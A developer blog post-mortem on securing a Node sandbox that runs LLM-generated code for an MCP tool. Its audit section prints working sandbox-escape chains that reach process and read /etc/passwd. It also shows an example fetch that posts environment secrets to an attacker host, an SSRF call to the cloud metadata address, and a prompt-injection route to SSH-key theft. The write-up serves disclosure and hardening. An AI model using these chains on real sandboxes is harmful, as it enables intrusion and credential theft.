What if your AI assistant didn't just write code, but ran it, looked at what happened, and told you the answer?

That's the loop we wanted Directive's MCP server to close. The LLM generates a Directive module. It runs the module in a sandbox. The transcript comes back in chat – the facts, the logs, the errors – and the LLM uses observed behavior to refine its next answer. No "probably this works"; no "open a sandbox and check yourself"; just an answer grounded in what the code actually did.

To make that real we shipped @directive-run/sandbox. This is the post-mortem of building it, breaking it via a focused security audit, and shipping the hardening – all in 72 hours.

The shape of the problem

The MCP server already had tools that returned code: generate_module, get_example, fix_code. What it didn't have was a way to execute that code and return what happened. Without execution, the LLM is reasoning about static text – useful, but it can't tell whether a generated constraint actually fires, whether a derivation evaluates to the right value, whether await system.settle() resolves cleanly or hits a retry-backoff timeout.

So the goal: a single MCP tool, run_in_sandbox, that takes a Directive snippet and returns:

The captured console.log / console.warn / console.error lines.
The post-settle() facts snapshot (system.facts.$store.toObject()).
Each declared derivation's computed value (system.derive[key]).
Any errors – from the validator, the bundler, the runtime, or a wall-clock timeout.

Pair that with the existing playground_link tool that hands the user a clickable URL to edit in StackBlitz, and the LLM has two complementary primitives: show a user observed behavior in chat, or hand off an interactive editor.

Three layers, the naive way

A first-pass implementation has three layers that fall out of the requirements naturally:

A validator that refuses unsafe imports and identifiers. Built on ts-morph – walk the AST of each file, reject imports outside the @directive-run/* allowlist, reject free identifier references to process, require, fetch, eval, and friends.
A bundler that virtualizes the multi-file payload. Built on esbuild – pin every file in an in-memory plugin's resolve hook, mark @directive-run/* as external (Node's loader finds those in node_modules), and enable top-level await so await system.settle() works.
A worker_threads worker with resourceLimits. 32 MB heap, 16 MB code, 5-second wall-clock budget enforced by worker.terminate(). Capture console.* to a buffer, lift the runner's system binding onto a side-channel global so we can snapshot facts after the run completes.
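The third layer can be sketched with nothing but Node's built-in worker_threads module. This is a minimal illustration, not the package's actual worker: runInWorker is a hypothetical name, mapping "32 MB heap, 16 MB code" onto maxOldGenerationSizeMb and codeRangeSizeMb is an assumption, and the snippet is evaluated with new Function for brevity where the real sandbox imports an esbuild bundle.

```javascript
const { Worker } = require("node:worker_threads");

// Hypothetical helper: run a snippet in a worker with memory limits and a
// wall-clock budget, and return the captured console.log lines.
function runInWorker(userCode, timeoutMs = 5000) {
  // Worker body: capture console.log into a buffer, run the snippet, report back.
  const workerSource = `
    const { parentPort, workerData } = require("node:worker_threads");
    const logs = [];
    console.log = (...args) => logs.push("[log] " + args.join(" "));
    try {
      new Function(workerData.userCode)();
      parentPort.postMessage({ ok: true, logs });
    } catch (err) {
      parentPort.postMessage({ ok: false, logs, error: String(err) });
    }
  `;

  return new Promise((resolve) => {
    const worker = new Worker(workerSource, {
      eval: true,
      workerData: { userCode },
      // Assumed mapping of the limits described above.
      resourceLimits: { maxOldGenerationSizeMb: 32, codeRangeSizeMb: 16 },
    });

    // terminate() stops the worker even when it is stuck in a synchronous loop.
    const timer = setTimeout(() => {
      worker.terminate();
      resolve({ ok: false, logs: [], error: "timeout" });
    }, timeoutMs);

    worker.once("message", (result) => {
      clearTimeout(timer);
      worker.terminate();
      resolve(result);
    });
    worker.once("error", (err) => {
      clearTimeout(timer);
      resolve({ ok: false, logs: [], error: String(err) });
    });
  });
}
```

The timeout lives on the host side on purpose: a snippet that never yields cannot be interrupted from inside its own thread, so the budget has to be enforced by whoever holds the Worker handle.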

This shipped as @directive-run/sandbox@0.1.0 on 2026-06-06. The MCP run_in_sandbox tool went out the same day in @directive-run/mcp@0.5.0. The playground page at directive.run/playground got a new DevTools panel that hits the same sandbox via an internal Next.js API route.

It worked. Demo videos felt magical. Then we did the audit.

The 5-lens audit

Before declaring a security-sensitive feature shipped, we run it through a multi-agent AE (architecture/expert) review – a pattern that's become standard for any feature whose README claims "this is the boundary." Five lenses, in parallel, each focused on a single perspective:

Security / red-team – write attack chains, not advisories. If you can't write the chain, mark it "needs investigation."
Architecture – is the component split right? Is the regex hack durable? What deploys does this assume?
Agent-UX – when the LLM sees the tool description and an error message, can it self-correct?
DX – can someone npm-install the package and integrate it in 15 minutes?
Domain-correctness – does the sandbox model Directive's runtime honestly, or does it lie about half the surface?

The reports came back with grades: D, B+, B-, B-, C+. The single D was for security – it came with three working exploit chains.

The bypass

The validator had a rule that read sensibly when you skimmed it:

Skip identifiers in property-access position. The module in createSystem({ module: counter }) is a property KEY, not a reference to Node's CJS module global. We don't want to false-positive on {module: x} patterns.

That rule was a total denylist bypass.

// Validator says: process is denied as a free identifier.
process.exit(0);  // rejected, no problem.

// But globalThis is allowed. And the second .process? Property
// position. Skipped. Combine the two:
globalThis.process.exit(0);  // worked. host died.

Three working chains, all stemming from the same skip:

// (1) Direct globalThis escape
globalThis.process.mainModule.require("node:fs").readFileSync("/etc/passwd");

// (2) Reflect.get smuggle (string literal as second arg)
const procViaReflect = Reflect.get(globalThis, "process");

// (3) Function constructor smuggle (.constructor on any value)
const F = ({}).constructor.constructor;
const procViaFunction = F("return process")();

Each one reached process, which on the Vercel API route surface meant any anonymous attacker could drain environment variables – OPENAI_API_KEY, VERCEL_*, DATABASE_URL – via globalThis.fetch(attacker, { method: "POST", body: JSON.stringify(globalThis.process.env) }). On the MCP local-trust surface, a malicious snippet from a prompt-injection in a doc the LLM had read could exfiltrate SSH keys.
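The three chains are easy to confirm in plain Node, outside any sandbox. The check below assumes nothing about the validator. It only shows that each expression evaluates to the same object as the bare process identifier, which is why denying the identifier alone was not enough.

```javascript
// Each line reaches Node's process object without using `process`
// as a free identifier.
const viaGlobalThis = globalThis.process;
const viaReflect = Reflect.get(globalThis, "process");
const viaFunctionCtor = ({}).constructor.constructor("return process")();

console.log(viaGlobalThis === process);   // true
console.log(viaReflect === process);      // true
console.log(viaFunctionCtor === process); // true
```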

The audit also caught:

SSRF via allowlisted packages. @directive-run/query calls fetch inside its own module body. The validator only sees user source. A snippet that did createBaseQuery({ baseUrl: "http://169.254.169.254" }) would hit AWS IMDS without ever touching fetch in user code.
No rate limit on the docs-site API route. Anonymous attacker fires 100 concurrent while(true){} snippets, drains the Vercel function quota. Same surface, denial-of-service flavor.
Temp-file location broke Vercel. The bundle was written inside the sandbox package's own node_modules directory so Node's resolver could walk up. Vercel and AWS Lambda ship read-only filesystems outside /tmp. The route looked deployable but the first execution attempt would have failed at mkdtempSync.
Two transcripts disagreed. result.facts correctly reflected the snapshot, but console.log("[start] facts:", system.facts) rendered as [start] facts: {} in the same response. JSON.stringify on the FactsStore proxy returned "{}". A confused user would assume the engine was broken.
Half the runtime was missing. result.facts covered only facts. Modules whose primary product is a derivation – isReady, status, total – returned a transcript that looked empty even though everything ran fine.

Twelve P0s total. The per-lens grades were synthesized into docs/AE-AUDIT-SANDBOX.md along with a P1 backlog, a P2 polish list, and an explicit threat-model coverage map.

The hotfix

The first commit went out same-day. The validator gained a dedicated checkPropertyAccessEscapes pass that closes the bypass class:

Reject any PropertyAccessExpression whose .name matches the deny-list.
Reject .constructor access on any value – there's no legitimate Directive use, and it's the Function-constructor smuggle vector.
Reject globalThis["X"] bracket access with a string literal, even when X is in the allowlist – there's no reason to reach allowlisted names via bracket syntax.
Reject bracket access whose literal matches a denied name on any receiver.
Reject Function(...) as a call expression (in addition to the existing new Function(...) denial).
Reject Reflect.get(globalThis, "X") / Reflect.has(globalThis, "X") / Object.getOwnPropertyDescriptor(globalThis, "X") when the second arg is a denied-name string literal.

17 PoC regression tests went in alongside the fix. Every chain from the audit doc has a test that proves it now fails. The "skip property-key in object literal" original false-positive case still passes – legitimate createSystem({ module: counter }) works.
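The rules above can be sketched as a single tree walk. The real pass is built on ts-morph. To stay dependency-free, this illustration walks hand-built ESTree-shaped nodes instead, so the node shapes, the DENIED subset, and the helper names (id, str, member, call) are all assumptions made for the example.

```javascript
// Illustrative subset of denied names, not the package's actual list.
const DENIED = new Set(["process", "require", "module", "fetch", "eval", "Function"]);
const REFLECTIVE_LOOKUPS = new Set([
  "Reflect.get", "Reflect.has", "Object.getOwnPropertyDescriptor",
]);

const isIdent = (node, name) => Boolean(node) && node.type === "Identifier" && node.name === name;
const stringValue = (node) =>
  node && node.type === "Literal" && typeof node.value === "string" ? node.value : null;

function checkPropertyAccessEscapes(node, violations = []) {
  if (node === null || typeof node !== "object") return violations;

  if (node.type === "MemberExpression") {
    // obj.name carries an Identifier; obj["name"] carries a string Literal.
    const name = node.computed ? stringValue(node.property) : node.property.name;
    if (name === "constructor") violations.push("constructor access");
    else if (name !== null && DENIED.has(name)) violations.push(`denied property "${name}"`);
    else if (node.computed && name !== null && isIdent(node.object, "globalThis"))
      violations.push(`globalThis["${name}"] bracket access`);
  }

  if (node.type === "CallExpression") {
    const { callee, arguments: args } = node;
    if (isIdent(callee, "Function")) violations.push("Function(...) call");
    if (callee.type === "MemberExpression" && !callee.computed &&
        callee.object.type === "Identifier" &&
        REFLECTIVE_LOOKUPS.has(`${callee.object.name}.${callee.property.name}`) &&
        isIdent(args[0], "globalThis") && DENIED.has(stringValue(args[1])))
      violations.push(`reflective lookup of "${args[1].value}"`);
  }

  // Recurse into children. Object-literal keys are Property nodes, never
  // MemberExpressions, so { module: counter } is not flagged by this pass.
  for (const child of Object.values(node)) checkPropertyAccessEscapes(child, violations);
  return violations;
}

// Tiny node builders for the examples below.
const id = (name) => ({ type: "Identifier", name });
const str = (value) => ({ type: "Literal", value });
const member = (object, property, computed = false) =>
  ({ type: "MemberExpression", object, property, computed });
const call = (callee, ...args) => ({ type: "CallExpression", callee, arguments: args });

// globalThis.process.exit(0)
const escapeAttempt = call(member(member(id("globalThis"), id("process")), id("exit")),
  { type: "Literal", value: 0 });
// createSystem({ module: counter })
const legitimate = call(id("createSystem"), {
  type: "ObjectExpression",
  properties: [{ type: "Property", key: id("module"), value: id("counter"), computed: false }],
});

console.log(checkPropertyAccessEscapes(escapeAttempt)); // [ 'denied property "process"' ]
console.log(checkPropertyAccessEscapes(legitimate));    // []
```

Keeping the denied case and the legitimate case side by side is the point: the exemption for object-literal keys is only safe while the equivalent property-access form is proven to fail.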

The tool description got rewritten too. The original said the allowlist was @directive-run/{core, ai, query}. After the v0.2.0 widening, the actual allowlist had 16 packages. An LLM reading the description was preemptively rejecting valid React/Vue/AI snippets because the documentation was out of date.

That shipped within an hour.

The cleanup PR

The remaining five P0s took longer because they touched multiple files, but they were all on the same path: defense in depth around what worker_threads and a strict validator alone can't cover.

SSRF wrapper. The worker patches globalThis.fetch before importing the user's bundle. The wrapper rejects:

Loopback: 127.0.0.0/8, ::1, localhost.
Link-local: 169.254.0.0/16 – including the cloud metadata endpoint at 169.254.169.254.
RFC-1918 private: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16.
Multicast, reserved, carrier-grade NAT.
IPv4-mapped IPv6 in literal AND hex form (Node's URL parser normalizes ::ffff:169.254.169.254 to ::ffff:a9fe:a9fe).
Non-HTTP(S) protocols (file:, ftp:, data:, javascript:).

The validator already blocked fetch as a free identifier and as globalThis.fetch property access. The wrapper layer catches the case the validator can't see: @directive-run/query's internal fetch calls living inside the package's own module body.
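A wrapper along these lines can be sketched with the built-in URL parser. This is an illustration under stated assumptions rather than the shipped code: isBlockedUrl and installFetchGuard are hypothetical names, the range table is one reading of the list above, and the sketch checks only literal hosts, so a public hostname that resolves to a private address is outside what it covers.

```javascript
// CIDR ranges taken from the categories listed above.
const BLOCKED_V4_RANGES = [
  ["0.0.0.0", 8],      // reserved "this network"
  ["10.0.0.0", 8],     // RFC 1918
  ["100.64.0.0", 10],  // carrier-grade NAT
  ["127.0.0.0", 8],    // loopback
  ["169.254.0.0", 16], // link-local, includes 169.254.169.254
  ["172.16.0.0", 12],  // RFC 1918
  ["192.168.0.0", 16], // RFC 1918
  ["224.0.0.0", 4],    // multicast
  ["240.0.0.0", 4],    // reserved
];

// Dotted-quad string to unsigned 32-bit integer, or null if not IPv4.
function ipv4ToInt(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const p = m.slice(1).map(Number);
  if (p.some((n) => n > 255)) return null;
  return ((p[0] << 24) | (p[1] << 16) | (p[2] << 8) | p[3]) >>> 0;
}

function isBlockedIpv4(ip) {
  return BLOCKED_V4_RANGES.some(([base, bits]) => {
    const mask = (~0 << (32 - bits)) >>> 0;
    return ((ip & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
  });
}

function isBlockedUrl(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch { return true; } // unparseable: refuse
  if (url.protocol !== "http:" && url.protocol !== "https:") return true;

  // URL.hostname keeps the brackets around IPv6 literals.
  const host = url.hostname.replace(/^\[|\]$/g, "").toLowerCase();
  if (host === "localhost" || host.endsWith(".localhost") || host === "::1") return true;

  // The parser normalizes ::ffff:169.254.169.254 to ::ffff:a9fe:a9fe.
  const mapped = /^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/.exec(host);
  if (mapped) {
    const ip = ((parseInt(mapped[1], 16) << 16) | parseInt(mapped[2], 16)) >>> 0;
    return isBlockedIpv4(ip);
  }

  const v4 = ipv4ToInt(host);
  return v4 !== null && isBlockedIpv4(v4);
}

// Replace target.fetch with a guarded version before any user code loads.
function installFetchGuard(target = globalThis) {
  const realFetch = target.fetch;
  target.fetch = (input, init) => {
    const raw = typeof input === "string" ? input
      : input instanceof URL ? input.href : input.url;
    if (isBlockedUrl(raw)) return Promise.reject(new TypeError(`blocked by sandbox: ${raw}`));
    return realFetch(input, init);
  };
}
```

Patching the global rather than the call site is what lets the guard see requests made from inside an allowlisted package, since those never pass through user source.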

Vercel-compatible temp-file location. The bundle now writes to os.tmpdir() first (Vercel-friendly) and falls back to the package dir. The bundler resolves @directive-run/* imports to absolute file:// URLs via createRequire(import.meta.url).resolve(), so the worker can import the bundle from /tmp without needing a node_modules chain above it. AWS Lambda, Cloud Run, and Cloudflare Workers all inherit the fix.
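The two halves of that fix can be sketched with Node built-ins. writeBundle and toFileUrl are hypothetical names, and this CommonJS version takes the resolving file as a parameter where the description above uses import.meta.url.

```javascript
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");
const { createRequire } = require("node:module");
const { pathToFileURL } = require("node:url");

// Write the bundle under os.tmpdir() first; fall back to another directory
// (for example the package's own) only if the temp dir is not writable.
function writeBundle(code, fallbackDir) {
  for (const base of [os.tmpdir(), fallbackDir]) {
    if (!base) continue;
    try {
      const dir = fs.mkdtempSync(path.join(base, "sandbox-"));
      const file = path.join(dir, "bundle.mjs");
      fs.writeFileSync(file, code);
      return file;
    } catch {
      // Not writable: try the next candidate.
    }
  }
  throw new Error("no writable directory for the sandbox bundle");
}

// Resolve a bare specifier from the host's location and return an absolute
// file:// URL, so the bundle can import it from anywhere on disk.
function toFileUrl(specifier, fromFile) {
  const resolved = createRequire(fromFile).resolve(specifier);
  return pathToFileURL(resolved).href;
}
```

Because every import in the bundle is already absolute, the bundle's own location stops mattering, which is what makes a read-only deployment filesystem tolerable.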

Facts proxy serialization. captureConsole now detects Directive's facts proxy via the $store.toObject() and $snapshot() escape hatches, serializes the snapshot, and falls back to JSON.stringify for non-Directive values. The log line and result.facts now agree.
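The mismatch is easy to reproduce with any Proxy that answers property reads but exposes no own keys. In the sketch below, fakeFacts is a stand-in built for the example, not Directive's real proxy, and formatLogArg is a hypothetical name for the detection step.

```javascript
// Format one console argument, preferring a facts snapshot when available.
function formatLogArg(value) {
  if (typeof value === "string") return value;
  if (value !== null && typeof value === "object") {
    const store = value.$store;
    if (store && typeof store.toObject === "function") {
      return JSON.stringify(store.toObject());
    }
    if (typeof value.$snapshot === "function") {
      return JSON.stringify(value.$snapshot());
    }
  }
  return JSON.stringify(value);
}

// Stand-in proxy: reads work, but the empty target has no own keys,
// so JSON.stringify sees nothing to serialize.
const data = { count: 0 };
const fakeFacts = new Proxy({}, {
  get(_target, key) {
    if (key === "$store") return { toObject: () => ({ ...data }) };
    return data[key];
  },
});

console.log(JSON.stringify(fakeFacts)); // {}
console.log(formatLogArg(fakeFacts));   // {"count":0}
```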

Derivations in the snapshot. The host pre-extracts derivation key names from the source files via a brace-balanced scanner (handles both multi-line derive: {\n isReady: …\n} and compact derive: { isReady: … } forms). The worker iterates each via system.derive[key] after settle() and packs the values into result.derived. Modules whose primary product is a derivation now show it.
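A brace-balanced scan of this kind can be sketched in a few lines. extractDeriveKeys is a hypothetical name, and the sketch makes simplifying assumptions the real scanner may not: it reads only the first derive block, recognizes only the key: value form, and ignores braces inside strings or comments.

```javascript
// Collect the top-level keys of the first `derive: { ... }` block.
function extractDeriveKeys(source) {
  const match = /\bderive\s*:\s*\{/.exec(source);
  if (!match) return [];

  let depth = 1;     // we start just inside the opening brace
  let topLevel = ""; // text at depth 1 only; nested bodies are dropped
  for (let i = match.index + match[0].length; i < source.length && depth > 0; i++) {
    const ch = source[i];
    if ("{([".includes(ch)) depth++;
    else if ("})]".includes(ch)) depth--;
    else if (depth === 1) topLevel += ch;
  }

  // Each comma-separated entry at depth 1 should start with `key:`.
  return topLevel
    .split(",")
    .map((entry) => /^\s*([A-Za-z_$][\w$]*)\s*:/.exec(entry))
    .filter(Boolean)
    .map((m) => m[1]);
}

const compact = "derive: { isReady: (facts) => facts.count > 0 }";
const multiLine = [
  "derive: {",
  "  doubled: (facts) => facts.count * 2,",
  "  total: (facts) => { return facts.a + facts.b; },",
  "},",
].join("\n");

console.log(extractDeriveKeys(compact));   // [ 'isReady' ]
console.log(extractDeriveKeys(multiLine)); // [ 'doubled', 'total' ]
```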

Rate limit + Origin check on the docs API route. Per-IP rate limit at 10 requests per 60-second window, max 3 concurrent in-flight per IP, Origin allowlist (directive.run, www.directive.run, localhost:3000/3001), Retry-After header on 429 responses. An in-memory Map for v1; Upstash KV is the upgrade path when sustained load justifies the dependency.
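An in-memory limiter with those numbers fits in one small closure. The sketch below is an assumption-laden illustration: createRateLimiter and isAllowedOrigin are hypothetical names, the window is implemented as a fixed window, the URL schemes in the Origin list are guesses, and the clock is injectable so the behavior can be checked without waiting.

```javascript
function createRateLimiter({ limit = 10, windowMs = 60_000, maxConcurrent = 3, now = Date.now } = {}) {
  const state = new Map(); // ip -> { windowStart, count, inFlight }

  return {
    // Call before running a snippet; pair every successful acquire with release.
    acquire(ip) {
      const t = now();
      let entry = state.get(ip);
      if (!entry) {
        entry = { windowStart: t, count: 0, inFlight: 0 };
        state.set(ip, entry);
      }
      if (t - entry.windowStart >= windowMs) {
        entry.windowStart = t; // start a fresh window
        entry.count = 0;
      }
      if (entry.count >= limit) {
        // Seconds until the window resets, for the Retry-After header.
        const retryAfter = Math.ceil((entry.windowStart + windowMs - t) / 1000);
        return { ok: false, status: 429, retryAfter };
      }
      if (entry.inFlight >= maxConcurrent) {
        return { ok: false, status: 429, retryAfter: 1 };
      }
      entry.count++;
      entry.inFlight++;
      return { ok: true };
    },
    release(ip) {
      const entry = state.get(ip);
      if (entry && entry.inFlight > 0) entry.inFlight--;
    },
  };
}

// Hosts come from the list above; the schemes are assumed.
const ALLOWED_ORIGINS = new Set([
  "https://directive.run",
  "https://www.directive.run",
  "http://localhost:3000",
  "http://localhost:3001",
]);
const isAllowedOrigin = (origin) => ALLOWED_ORIGINS.has(origin);
```

A Map like this is per-process, so on a platform that runs several function instances each one keeps its own counts. That is the gap a shared store closes.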

All five shipped to npm in @directive-run/sandbox@0.3.0 and @directive-run/mcp@0.5.2.

What you can actually do with this

After all of that, here's the loop the LLM gets to run today:

You:    "Build me a Directive counter that doubles in a derivation, then run it
         and tell me what doubled looks like after three bumps."

LLM:    [calls generate_module → counter module + runner]
        [calls run_in_sandbox with the paired files]

Sandbox responds:
  logs:    ["[log] [start] facts: {\"count\":0}",
            "[log] [settled] facts: {\"count\":3}"]
  facts:   { count: 3 }
  derived: { doubled: 6 }
  errors:  []

LLM:    "After three bumps, facts.count is 3 and the derivation doubled is 6.
         Here's the source. Want me to add a constraint that caps the count?
         [playground link]"

The doubled value comes from system.derive.doubled – which would have been invisible before the audit. The playgroundUrl in the response is the click-through to StackBlitz if the user wants to iterate live.

Try it now: ask Claude (with the @directive-run/mcp server installed) to "build a Directive traffic light and run it." Or paste a snippet into the playground and click Run. The transcript that comes back is what the sandbox saw.

The lessons we kept

Three pieces of this story moved into the team's cross-project recipe book:

"Skip the false-positive case" exemptions in security validators are footguns. The property-access skip was added to suppress one specific noise pattern. Without a regression test that proved the equivalent denied-name pattern in the same context still got rejected, the skip silently over-shot into a total bypass. The fix isn't "don't write skips" – it's "every skip needs a paired test that proves the denial it bypasses is still in force."
Run the security audit BEFORE the public deploy. We shipped to npm + Vercel before the audit, which meant the live /api/run-sandbox endpoint had an exploitable bypass for about 24 hours. The fix is procedural: any feature whose README claims "this is the boundary" gets a security-specific AE audit before it touches a public surface, not as a follow-on.
Tool descriptions can lie and the LLM has no way to know. The original description claimed the allowlist was three packages when the actual list was sixteen. The LLM was rejecting valid code because of documentation drift. When a single source of truth is duplicated to a description / README / changelog, build a runtime-emitted version – a getAllowedPackages() function the LLM can read via a meta-tool, so description and code can't drift.
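The third lesson can be sketched as one constant that both the validator and the tool description read from. Only getAllowedPackages is named above. ALLOWED_PACKAGES, isAllowedImport, and buildToolDescription are hypothetical, and the three entries are the ones the original description mentioned, used here as placeholders for the full list.

```javascript
// Single source of truth. Placeholder entries, not the real sixteen.
const ALLOWED_PACKAGES = Object.freeze([
  "@directive-run/core",
  "@directive-run/ai",
  "@directive-run/query",
]);

// What a meta-tool could return to the LLM at runtime.
function getAllowedPackages() {
  return [...ALLOWED_PACKAGES];
}

// What the validator would check imports against.
function isAllowedImport(specifier) {
  return ALLOWED_PACKAGES.some(
    (pkg) => specifier === pkg || specifier.startsWith(pkg + "/")
  );
}

// The description is generated from the same list, so it cannot drift.
function buildToolDescription() {
  return "Runs a Directive snippet in a sandbox. Allowed imports: " +
    getAllowedPackages().join(", ") + ".";
}

console.log(buildToolDescription());
```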

The full audit document with per-lens grades, threat-model coverage, and the remaining P1/P2 backlog lives at docs/AE-AUDIT-SANDBOX.md in the directive monorepo. It's open – if you find a chain the regression tests don't cover, the issue tracker is at github.com/directive-run/directive.

What's next

The 12 P0s are all closed. Roughly 30 P1s remain – tagged error kinds for cleaner LLM routing, an AbortSignal parameter for cancellation, an XOR-discriminated RunInSandboxInput type so that passing {source, files} together is a TS error, a runtime-emitted allowlist surface, and replacing the bundler's regex-based injectEarlyCapture with an AST rewrite. They're cataloged in the audit doc; none of them is exploitable in the way the P0s were.

Phase B – a proper threat-model page that explains "what we promise vs. what we don't" in plain English – is still pending. So is the validate_snippet MCP tool that lets the LLM check a snippet against the allowlist without actually executing it.

If you're using run_in_sandbox in a real workflow, we want to hear about it. What's the smallest case where the transcript saved you an iteration? What's the bug we still haven't caught? File an issue or message us. Same offer for anyone integrating @directive-run/sandbox directly into a CI gate, a teaching tool, or a hosted playground of your own – the package is shaped for those use cases too, and your feedback shapes the P1 prioritization.

Links:

@directive-run/sandbox – the npm package.
@directive-run/mcp – the MCP server with run_in_sandbox.
Sandbox docs – API reference + threat model.
Playground – the live UI.

Safe Snippet Execution for LLMs – Shipping @directive-run/sandbox
